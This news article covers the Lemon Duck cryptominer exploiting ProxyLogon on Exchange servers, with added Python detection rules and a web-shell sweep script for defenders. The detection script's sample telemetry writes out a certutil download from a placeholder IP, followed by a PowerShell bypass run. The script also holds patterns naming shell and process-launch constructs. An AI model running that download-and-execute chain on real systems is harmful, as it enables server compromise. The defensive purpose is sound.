On 2 March 2021, Microsoft released security patches for multiple zero-day vulnerabilities that were being used to attack on-premises versions of Microsoft Exchange Server. The bugs are known collectively as ProxyLogon.
An exploit for ProxyLogon appeared almost immediately. Some reports suggest that the code for the exploit was leaked accidentally or deliberately after researchers created a proof-of-concept exploit for security research.
Regardless of its origins, the exploit remains freely accessible, and adversaries, including operators of ransomware, cryptominers and information stealers, have been quick to seize the chance to use it in attacks targeting unpatched Exchange servers.
The Lemon Duck malware
Sophos recently discovered that the advanced crypto-miner malware, Lemon Duck, had added the ProxyLogon exploit to one of its updates. According to Sophos senior threat researcher Rajesh Nataraj, this updated version was being used to target unpatched Microsoft Exchange servers alongside a range of features that, between them, allow the malware to establish a ‘firm foothold’ in a compromised server, while evading detection by defenders.
Attacks using the ProxyLogon exploit involve the injection of web shells onto an infected server. These web shells are attacker files that are added to a web server's directory and enable the attacker to issue new instructions, for instance to execute a file at any time simply by requesting it from the web server.
“Web shells are pernicious. They provide attackers with a permanent backdoor into a victim's web applications and related systems, with the ability to add commands of their choice, whenever they want to, directly onto the web server, without needing to log in first,” says Nataraj.
“This version of Lemon Duck allows an attacker to copy the web shells they use and hide them in a different location – boosting the likelihood of the shells remaining unseen so they can be used again.”
However, this isn't the only hallmark of a ProxyLogon-enabled Lemon Duck attack. Others include:
- The installation of the miner payload as a Windows service to establish persistence
- Use of an Oracle WebLogic server exploit to attempt to move laterally to other servers on the network
- In some cases, the use of certutil.exe to download the Lemon Duck payload, which is launched using PowerShell
- The creation of a user account with remote desktop access
- Updates to Lemon Duck's defence evasion code, which attempt to disable and remove even more security products.
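The hallmarks listed above translate directly into detection logic. The following Python is an added example, not Sophos code or a Lemon Duck artefact: it runs a handful of rules over constructed telemetry records modelled on Sysmon process-creation events (event_id 1), Service Control Manager service-installation events (7045) and Windows Security log account-creation and group-membership events (4720, 4732). The field names, hostnames, paths and the 203.0.113.5 address are assumptions invented for the sample.

```python
"""Detection rules for the Lemon Duck behaviours described above (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


WEB_WORKER = "w3wp.exe"  # IIS worker process that hosts Exchange's web applications
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "certutil.exe", "wscript.exe", "cscript.exe"}
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache|-f\s+https?://", re.I)
USER_WRITABLE = ("\\temp\\", "\\users\\", "\\programdata\\", "\\appdata\\")
RDP_GROUP = "remote desktop users"

# Constructed sample telemetry (assumed schema): a short Lemon Duck-style chain plus benign noise.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "exch01", "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://203.0.113.5/ld.txt C:\Windows\Temp\ld.ps1"},
    {"event_id": 1, "host": "exch01", "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\ld.ps1"},
    {"event_id": 1, "host": "exch01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
    {"event_id": 7045, "host": "exch01", "service_name": "WinUpdateHelper",
     "image_path": r"C:\Windows\Temp\svc.exe"},
    {"event_id": 7045, "host": "exch01", "service_name": "VendorAgent",
     "image_path": r"C:\Program Files\Vendor\agent.exe"},
    {"event_id": 4720, "host": "exch01", "target_user": "svc_backup"},
    {"event_id": 4732, "host": "exch01", "group": "Remote Desktop Users", "member": "svc_backup"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events: Iterable[Dict]) -> List[Finding]:
    """Apply the rules in event order and return every hit."""
    findings: List[Finding] = []
    created = set()  # (host, user) pairs seen in 4720 events on this pass
    for e in events:
        host, eid = e.get("host", "?"), e.get("event_id")
        if eid == 1:  # process creation
            image = _basename(e.get("image", ""))
            parent = _basename(e.get("parent_image", ""))
            cmd = e.get("command_line", "")
            # Rule: certutil used as a downloader (the payload-fetch step in the list above).
            if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
                findings.append(Finding("certutil_download", host, cmd))
            # Rule: the IIS worker spawning a script host is the signature of web shell use.
            if parent == WEB_WORKER and image in SCRIPT_HOSTS:
                findings.append(Finding("web_worker_spawned_script_host", host, f"{parent} -> {image}"))
        elif eid == 7045:  # new service installed
            path = e.get("image_path", "").lower()
            # Rule: a service binary under a user-writable directory (miner installed as a service).
            if any(d in path for d in USER_WRITABLE):
                findings.append(Finding("service_in_user_writable_dir", host,
                                        f"{e.get('service_name')} -> {e.get('image_path')}"))
        elif eid == 4720:  # account created
            created.add((host, e.get("target_user", "").lower()))
        elif eid == 4732:  # member added to a local group
            member = e.get("member", "").lower()
            # Rule: a freshly created account immediately granted Remote Desktop access.
            if e.get("group", "").lower() == RDP_GROUP and (host, member) in created:
                findings.append(Finding("new_account_granted_rdp", host, member))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The account rule deliberately correlates 4720 with a later 4732 rather than alerting on either alone, which keeps routine administrator activity from paging anyone; the other three rules are narrow enough to stand on their own.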
What defenders can do
In the light of Sophos' research, Nataraj recommends defenders take urgent steps to install Microsoft's patches to prevent exploitation of their Exchange Server.
But, he adds, patching is not enough on its own.
“Organisations need to determine and address their wider exposure so they don't remain vulnerable to later attacks,” he says.
“For instance, admins should scan the Exchange server for web shells and monitor servers for any unusual processes that appear seemingly out of nowhere.
“High processor usage by an unfamiliar program could be a sign of cryptomining activity or ransomware. If this isn't possible, closely monitor the server until you migrate the Exchange data to an updated server then disconnect the unpatched server from the internet.”
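One way to carry out the web shell scan Nataraj recommends is to compare the server's web-facing script files against a baseline inventory taken from a known-good state, and to flag files that combine several constructs a legitimate Exchange page rarely needs. The Python below is an added example, not Sophos tooling: the directory layout, the baseline format and the fixture files it writes into a temporary directory are all constructed for the demonstration (the fixture contains only tokens, not a functioning shell), and on a real server the root would be the Exchange installation's web directories.

```python
"""Baseline-plus-pattern sweep for dropped or modified script files (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Extensions IIS will execute; a newly dropped file with one of these is the concern.
SCRIPT_EXTS = {".aspx", ".asmx", ".ashx", ".asp", ".php"}

# Constructs that are individually common but rarely appear together in legitimate pages.
RISKY = [
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"\bExecute(Global)?\s*\(", re.I),
    re.compile(r"Process\.Start\s*\(", re.I),
    re.compile(r"Request\s*(\.Item|\.Form|\.QueryString|\[)", re.I),
    re.compile(r"cmd\.exe|/bin/sh", re.I),
]
RISKY_THRESHOLD = 2  # flag a file only when at least this many constructs co-occur


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def script_files(root: Path) -> Iterator[Path]:
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTS:
            yield p


def build_baseline(root: Path) -> Dict[str, str]:
    """Relative path -> SHA-256 for every script file; capture this from a known-good install."""
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in script_files(root)}


def sweep(root: Path, baseline: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (relative path, reason) for each file that is new, changed, or looks like a shell."""
    findings: List[Tuple[str, str]] = []
    for p in script_files(root):
        rel = p.relative_to(root).as_posix()
        if rel not in baseline:
            findings.append((rel, "not in baseline inventory"))
        elif baseline[rel] != sha256_file(p):
            findings.append((rel, "content changed since baseline"))
        text = p.read_text(errors="replace")
        hits = [r.pattern for r in RISKY if r.search(text)]
        if len(hits) >= RISKY_THRESHOLD:
            findings.append((rel, "risky constructs: " + "; ".join(hits)))
    return sorted(findings)


def demo() -> List[Tuple[str, str]]:
    """Build a constructed web root, baseline it, simulate an intrusion, and sweep."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "owa" / "auth").mkdir(parents=True)
        (root / "ecp").mkdir()
        # Known-good pages (constructed): one reads a request parameter, which alone is benign.
        (root / "owa/auth/logon.aspx").write_text(
            '<%@ Page Language="C#" %>\n<html><body>sign in</body></html>\n')
        (root / "ecp/default.aspx").write_text(
            '<%@ Page Language="C#" %>\n<% var id = Request.QueryString["id"]; %>\n')
        baseline = build_baseline(root)

        # Constructed post-incident state: a dropped file and an edited existing page.
        (root / "owa/auth/help.aspx").write_text(
            '<%@ Page Language="JScript" %>\n'
            '<!-- constructed fixture, not a working shell: it carries the tokens '
            'Process.Start( and Request.Item[ only so the pattern check fires -->\n')
        with (root / "ecp/default.aspx").open("a") as fh:
            fh.write("<!-- trailing edit -->\n")
        return sweep(root, baseline)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

The baseline comparison does the heavy lifting: it catches a dropped file regardless of what it contains, and a modified legitimate page regardless of how the modification is obfuscated. The pattern check is a second opinion for servers where no baseline was ever taken, which is why it requires two co-occurring constructs rather than one.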
Organisations should also seek the best possible solutions aimed at protecting against these attacks. Sophos Intercept X and Sophos Intercept X with EDR protect against threats attempting to exploit the ProxyLogon Exchange vulnerabilities.
Learn more about the Sophos analysis of cryptominers and other threats targeting ProxyLogon vulnerabilities, detection and indicators of compromise at SophosLabs Uncut.